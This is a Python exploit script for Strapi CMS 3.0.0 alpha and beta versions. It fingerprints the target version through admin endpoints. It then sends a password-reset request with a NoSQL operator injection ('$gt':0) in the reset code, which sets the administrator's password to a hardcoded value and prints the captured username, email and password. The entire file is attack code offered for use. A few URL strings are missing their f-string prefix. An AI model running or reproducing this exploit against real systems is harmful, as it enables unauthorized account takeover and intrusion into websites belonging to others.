#Author Kynda
#01/01/2020

import requests, sys, json

NEW_PASS = "Shadawks123*"

if len(sys.argv) != 3:
    sys.exit("[ ! ] Usage: python3 exploit.py <url> <email>")

def isVuln(version):
    if version.startswith('3.0.0-beta') or version.startswith('3.0.0-alpha'):
        return True
    return False

def get_version(url):
    print("[ + ] Checking Strapi Version")
    r = requests.get(f"{url}/admin/init").json()
    try:
        if isVuln(r['data']['strapiVersion']):
            print("[ + ] Target version is vulnerable.")
        else:
            print("[ - ] Target version is not vulnerable.")
    except KeyError:
        try:
            r = requests.get(f"{url}/admin/strapiVersion").json()
            if isVuln(r['strapiVersion']):
                print("[ + ] Target version is vulnerable.")
            else:
                print("[ - ] Target version is not vulnerable.")
        except KeyError:
            print("[ - ] Can't find Strapi Version.")
        except json.decoder.JSONDecodeError:
            print("[ - ] Can't find Strapi Version.")

def pass_reset(url, email):
    params = {
        "code": {"$gt":0},
        "password": NEW_PASS,
        "passwordConfirmation": NEW_PASS
    }
    payload = {"email": email, "url":"{url}/admin/plugins/users-permissions/auth/reset-password"}
    requests.post("{url}/", json=payload)
    try:
        r = requests.post(f"{url}/admin/auth/reset-password", json=params).json()
        if "jwt" not in r:
            sys.exit("[ - ] Website is not vulnerable.")
        print(f"[ + ] Password reset successfull.\nUsername: {r['user']['username']}\nEmail: {r['user']['email']}\nPassword: {NEW_PASS}")
    except json.decoder.JSONDecodeError:
        sys.exit("[ - ] Website is not vulnerable.")

url = sys.argv[1][:-1] if sys.argv[1].endswith('/') else sys.argv[1]
email = sys.argv[2]
get_version(url)
pass_reset(url, email)